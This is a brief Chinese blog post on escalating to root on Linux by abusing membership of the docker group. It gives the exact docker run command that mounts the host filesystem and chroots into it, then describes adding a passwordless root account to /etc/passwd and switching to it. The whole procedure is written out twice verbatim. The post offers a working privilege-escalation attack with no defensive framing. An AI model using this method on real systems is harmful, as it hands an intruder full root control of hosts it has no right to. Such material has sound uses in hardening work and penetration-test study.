Linux 提权之 Docker 用户组提权
如果我们拿到了一个 Docker 用户组的用户权限,那么我们可以很轻松地完成提权
首先我们执行如下命令:
docker run -v /:/mnt --rm -it crf_web1 chroot /mnt sh然后在其中的 /etc/passwd 中写入一个 root 权限用户(这里直接无密码了)
然后退出来,直接尝试 su root2
提权成功
如果我们拿到了一个 Docker 用户组的用户权限,那么我们可以很轻松地完成提权
首先我们执行如下命令:
docker run -v /:/mnt --rm -it crf_web1 chroot /mnt sh然后在其中的 /etc/passwd 中写入一个 root 权限用户(这里直接无密码了)
然后退出来,直接尝试 su root2
提权成功
浙公网安备 33010602011771号